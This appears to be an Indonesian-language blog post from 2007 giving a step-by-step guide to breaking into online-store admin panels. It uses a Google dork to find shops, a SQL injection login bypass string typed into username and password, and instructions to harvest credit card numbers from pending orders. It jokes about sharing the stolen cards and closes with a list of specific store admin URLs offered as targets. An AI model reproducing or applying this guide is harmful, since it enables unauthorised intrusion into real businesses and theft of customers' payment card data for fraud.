Jumat, 26 Oktober 2007

Digishop


1--] Buka Google

2--] Ketik inurl:"/cart.php?m=" [atau kreasi lo sendiri]

3--] Pilih salah satu target misalnya
http://www.magichappenswithhorses.com/store/cart.php?m=
hapus tulisan cart.php?m= dengan admin
Jadi http://www.magichappenswithhorses.com/store/admin/

4--] Nanti akan muncul menu login.
Masukkan bug SQL Injection ini untuk Username dan Password
Pada Username dan Password, isi dengan 'or"="
_________________
Username : |_____'or"="______|
_________________
Password : |_____'or"="______|

5--] Klo berhasil, nanti akan muncul Main Menu dan silahkan
cari CC nya.
Liat yang pending orders karena CC nya masih ada, kalau
di pending orders CC nya udah ga ada berarti lo udah
keduluan orang, he...he...he...

6--] Klo yang muncul Invalid Username or Password, berarti SQL
Injection-nya udah ga mempan, he...he...he...silahkan cari
yang lain.

---==[ Tips : ]==---
- Klo` Lo dapet yang Order-an nya masih sedikit,
targetnya di simpen aja dulu, mungkin beberapa hari
kemudian udah ada CC baru
- Klo` dapet target bagus, jangan lupa bagi-bagi
ama gw, he...he...he...

GOOD LUCK !



---==[ Target ]==---


http://www.caycechristmasstore.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://cyberlies.securesites.com/store/admin

http://studentsagainstterrorism.org/store/admin/

http://www.ethics-twi.org/store/admin/

http://www.magichappenswithhorses.com/store/admin/

http://d2bfit.com/store/admin/

https://secure.rcaf.com/onlinestore/admin/

http://www.niktec.com/admin/

http://www.7footserb.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://www.flagsbygm.com/store/admin/

https://www.facesbyfelicia.com/store/admin/

Tidak ada komentar: